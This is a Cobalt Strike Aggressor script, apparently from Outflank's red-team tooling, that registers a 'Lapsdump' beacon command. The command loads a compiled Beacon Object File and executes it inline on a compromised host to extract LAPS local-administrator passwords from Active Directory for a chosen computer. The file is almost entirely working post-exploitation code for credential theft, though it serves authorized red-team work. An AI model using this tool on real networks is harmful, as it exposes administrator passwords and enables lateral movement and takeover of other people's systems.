#author Cornelis de Plaa
#@outflank.nl

beacon_command_register("Lapsdump", "Dump LAPS passwords from specified computers within Active Directory.",
    "Synopsis: Lapsdump [target]\n\n" .
    "Use Active Directory Service Interfaces (ADSI) to extract LAPS passwords from AD.\n");

alias Lapsdump {
    $bid = $1;

    $input = substr($0, 9);
    @args = split(' ', $input);

    $target = @args[0];

    if ($target eq "") {
	berror($bid, "Specify an ip or hostname");
	return;
    }

    # Read in the right BOF file
    $handle = openf(script_resource("Lapsdump." . barch($bid) . ".o"));
    $data   = readb($handle, -1);
    closef($handle);

    # Pack our arguments
    $arg_data  = bof_pack($bid, "Z", $target);

    beacon_inline_execute($bid, $data, "go", $arg_data);
}
